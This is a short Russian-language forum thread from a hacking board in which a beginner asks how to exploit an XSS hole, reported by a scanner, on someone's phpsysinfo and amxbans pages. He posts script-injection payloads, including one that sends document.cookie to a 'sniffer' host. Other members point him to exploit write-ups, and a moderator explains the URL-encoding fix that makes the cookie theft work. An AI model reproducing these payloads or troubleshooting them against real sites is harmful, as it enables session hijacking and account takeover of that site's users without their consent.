XSS хелп

Тема в разделе "Для новичков", создана пользователем reason, 4 апр 2012.

  1. reason
    reason Guest
    я просканировал сайт программой и в результате получилось следующие
    Cross Site Scripting (verified) сайт.ru/phpsysinfo/index.php

    пытаюсь проверить XSS вот таким способом сайт.ru/phpsysinfo/index.php?=<SCRIPT>alert('XSS')</SCRIPT>

    но ни каких изменений не происходит, подскажите как реализовать эту уязвимость или ссылку плииз
     
    4 апр 2012
  2. ToBapuw_XaKep
    ToBapuw_XaKep Новичок
    Симпатии:
    8
    если не знаем как это делать
    открываем google.ru
    вбиваем: phpsysinfo уязвимости
    сразу же видим первые 5 ссылок
    открываем
    получаем подробную инфу что и как.
    например, так:_http://www.xakep.ru/vulnerability/phpSysInfo/
    или так _http://safe.cnews.ru/bugtrack/entry/index.shtml?xploit/2007/07/31/102746

    во второй кстати написано что идет xss после слеша, так что пробуй
     
    4 апр 2012
  3. reason
    reason Guest
    а вот например угнал кто нибудь куки, он же зайдет уже в авторизованный акк
    а как можно пароль узнать чтобы пароль сменить, куки в себе содержат сам пароль ака?
     
    4 апр 2012
  4. cat1vo
    cat1vo Новичок
    Симпатии:
    5
    Ты перед тем как задать вопрос, сами куки смотрел?/facepalm
     
    Последнее редактирование: 4 апр 2012
    4 апр 2012
  5. reason
    reason Guest
    вот например ввожу в строке
    сайт.ru/amxbans/ban_search.php/index.php/"><SCRIPT>alert('XSS')</SCRIPT>
    появляется окошо - XSS
    при просмотре кода html видно
    /amxbans/ban_search.php/index.php/"><SCRIPT>alert('XSS')</SCRIPT>">

    если ввожу

    сайт.ru/index.php/"><script>img=new Image(); img.src="http://снифер.ru/s.gif?"+document.cookie;</script>

    то данная ссылка не работает и при просмотре HTML страницы видно такое
    /amxbans/ban_search.php/index.php/"><script>img=new Image();img.src="http://">

    отсутствует вот эта чать +document.cookie;</script>

    я так понимаю баг устранен? или у меня руки кривые?
     
    Последнее редактирование модератором: 13 апр 2012
    7 апр 2012
  6. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    152
    Код:
    %2Bdocument.cookie
    так?

    з.ы. почитай
     
    7 апр 2012
  7. reason
    reason Guest
    вопрос решен
     
    Последнее редактирование модератором: 18 апр 2012
    13 апр 2012
Загрузка...